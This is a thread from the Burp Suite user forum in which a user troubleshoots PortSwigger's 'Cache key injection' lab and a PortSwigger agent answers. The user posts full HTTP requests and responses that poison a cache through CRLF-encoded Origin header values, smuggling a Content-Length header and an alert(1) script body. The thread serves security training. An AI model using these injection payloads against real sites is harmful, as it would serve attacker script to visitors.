Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Lab: Cache key injection

Cyber | Last updated: Jun 01, 2023 12:55PM UTC

Hi, I can't solve the lab. I am sending the following requests, ----- 1. ----- First request (Please note that the Origin header has been added 2 times): GET /js/localize.js?lang=en?utm_content=z&cors=1&x=1 HTTP/1.1 Origin: x%0d%0aContent-Length:%208%0d%0a%0d%0aalert(1)$$$$ Host: 0afb003503bf820180b02bda008800cd.web-security-academy.net Cookie: session=1uh3txObzEBQpQNLO7PYdosDJ7zaWS7I; lang=en Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Sec-Ch-Ua: "Chromium";v="113", "Not-A.Brand";v="24" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close Pragma: x-get-cache-key Origin: x%0d%0aContent-Length:%208%0d%0a%0d%0aalert(1)$$$$ First response without duplicate Origin header: HTTP/1.1 200 OK Content-Type: application/javascript; charset=utf-8 Vary: Origin X-Frame-Options: SAMEORIGIN Cache-Control: max-age=35 Age: 0 X-Cache-Key: /js/localize.js?lang=en?cors=1&x=1$$ X-Cache: miss Connection: close Content-Length: 42 document.cookie = 'lang=en?utm_content=z'; First response with duplicate Origin header: HTTP/1.1 200 OK Content-Type: application/javascript; charset=utf-8 Access-Control-Allow-Origin: x Cache-Control: max-age=35 Age: 2 X-Cache-Key: /js/localize.js?lang=en?cors=1&x=1$$Origin=x%0d%0aContent-Length:%208%0d%0a%0d%0aalert(1)$$$$ X-Cache: hit Connection: close Content-Length: 8 alert(1) ----- 2. ----- Second request: GET /login?lang=en?utm_content=x%26cors=1%26x=1$$Origin=x%250d%250aContent-Length:%208%250d%250a%250d%250aalert(1)$$%23 HTTP/1.1 Host: 0afb003503bf820180b02bda008800cd.web-security-academy.net Cookie: session=1uh3txObzEBQpQNLO7PYdosDJ7zaWS7I; lang=en Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close Referer: https://0afb003503bf820180b02bda008800cd.web-security-academy.net/login?lang=en?utm_content=x%26cors=1%26x=1$$Origin=x%250d%250aContent%2DLength:%208%250d%250a%250d%250aalert(1)$$%23 Second response: HTTP/1.1 400 Bad Request Content-Type: application/json; charset=utf-8 Connection: close Content-Length: 16 "Protocol error" HTTP is downgraded to 1.1. Thanks.

Ben, PortSwigger Agent | Last updated: Jun 02, 2023 10:04AM UTC

Hi, Is there a reason for duplicating the Origin header in the first request and duplicating the utm_content in the second? If it helps, I was able to solve the lab using the following two requests: https://snipboard.io/vEPUB3.jpg https://snipboard.io/QZwI8A.jpg Does the following video walkthrough help at all: https://www.youtube.com/watch?v=fU65sWuZPyc

Cyber | Last updated: Jun 05, 2023 09:01AM UTC

Hi Ben, I noticed that the double Origin header in the first request is not needed if the dash in the Origin header value is removed (between "Content" and "Length"). --- 1 --- Origin: x%0d%0aContent-Length:%208%0d%0a%0d%0aalert(1)$$$$ returns this: HTTP/1.1 200 OK Content-Type: application/javascript; charset=utf-8 Vary: Origin X-Frame-Options: SAMEORIGIN Cache-Control: max-age=35 Age: 1 X-Cache-Key: /js/localize.js?lang=en?cors=1&x=1$$ X-Cache: hit Connection: close Content-Length: 42 document.cookie = 'lang=en?utm_content=z'; --------- --- 2 --- Origin: x%0d%0aContent%2dLength:%208%0d%0a%0d%0aalert(1)$$$$ returns this: HTTP/1.1 200 OK Content-Type: application/javascript; charset=utf-8 Access-Control-Allow-Origin: x Cache-Control: max-age=35 Age: 0 X-Cache-Key: /js/localize.js?lang=en?cors=1&x=1$$Origin=x%0d%0aContent%2dLength:%208%0d%0a%0d%0aalert(1)$$$$ X-Cache: miss Connection: close Content-Length: 8 alert(1) --------- Maybe there is a problem with the encoding. I tried the suggested video (https://www.youtube.com/watch?v=fU65sWuZPyc) but without much success.

Ben, PortSwigger Agent | Last updated: Jun 05, 2023 05:10PM UTC

Hi, Did you take a look at the screenshots of the example requests that I used to solve the lab? The lab appears to work as expected in line with the written solution.

Cyber | Last updated: Jun 07, 2023 08:12AM UTC